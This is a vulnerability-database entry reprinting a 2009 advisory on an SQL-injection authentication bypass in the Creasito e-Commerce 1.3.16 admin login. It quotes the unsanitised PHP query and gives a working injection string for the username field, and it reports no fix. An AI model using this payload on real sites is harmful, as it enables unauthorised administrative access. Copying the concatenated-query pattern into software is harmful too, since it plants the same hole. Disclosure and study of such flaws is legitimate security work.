Search...

Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln

2009-04-21T00:00:00

ID SSV:11074
Type seebug
Reporter Root
Modified 2009-04-21T00:00:00

Description

No description provided by source.

                                        
                                            
                                                *******   Salvatore &quot;drosophila&quot; Fresta   *******

[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 20 Apr 2009

[+] Discovered by: Salvatore &quot;drosophila&quot; Fresta
[+] Author: Salvatore &quot;drosophila&quot; Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs

This cms is entirely vulnerable to SQL Injection.
I decided to post authentication bypass security
flaw only.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php

SQL Injection bug allows a guest to bypass the
authentication system. The following is the
vulnerable code:

...

$username = $_POST['username'];

...

$sql = mysql_query(&quot;SELECT * FROM amministratore WHERE
username='$username' AND password='$password' AND activated='1'&quot;);

...


*************************************************

[+] Code


- [A] Authentication Bypass

Username: -1' OR '1'='1'#
Password: foo


*************************************************

[+] Fix

No fix.


*************************************************

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-11074", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-04-21T00:00:00", "title": "Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-11074", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2009-04-21T00:00:00", "sourceData": "\n ******* Salvatore "drosophila" Fresta *******\r\n\r\n[+] Application: creasito e-commerce content manager\r\n[+] Version: 1.3.16\r\n[+] Website: http://creasito.bloghosteria.com\r\n\r\n[+] Bugs: [A] Authentication Bypass\r\n\r\n[+] Exploitation: Remote\r\n[+] Date: 20 Apr 2009\r\n\r\n[+] Discovered by: Salvatore "drosophila" Fresta\r\n[+] Author: Salvatore "drosophila" Fresta\r\n[+] Contact: e-mail: drosophilaxxx@gmail.com\r\n\r\n\r\n*************************************************\r\n\r\n[+] Menu\r\n\r\n1) Bugs\r\n2) Code\r\n3) Fix\r\n\r\n\r\n*************************************************\r\n\r\n[+] Bugs\r\n\r\nThis cms is entirely vulnerable to SQL Injection.\r\nI decided to post authentication bypass security\r\nflaw only.\r\n\r\n- [A] Authentication Bypass\r\n\r\n[-] Risk: medium\r\n[-] Requisites: magic_quotes_gpc = off\r\n[-] File affected: admin/checkuser.php, checkuser.php\r\n\r\nSQL Injection bug allows a guest to bypass the\r\nauthentication system. The following is the\r\nvulnerable code:\r\n\r\n...\r\n\r\n$username = $_POST['username'];\r\n\r\n...\r\n\r\n$sql = mysql_query("SELECT * FROM amministratore WHERE\r\nusername='$username' AND password='$password' AND activated='1'");\r\n\r\n...\r\n\r\n\r\n*************************************************\r\n\r\n[+] Code\r\n\r\n\r\n- [A] Authentication Bypass\r\n\r\nUsername: -1' OR '1'='1'#\r\nPassword: foo\r\n\r\n\r\n*************************************************\r\n\r\n[+] Fix\r\n\r\nNo fix.\r\n\r\n\r\n*************************************************\n ", "id": "SSV:11074", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:52:48", "reporter": "Root", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645471481}}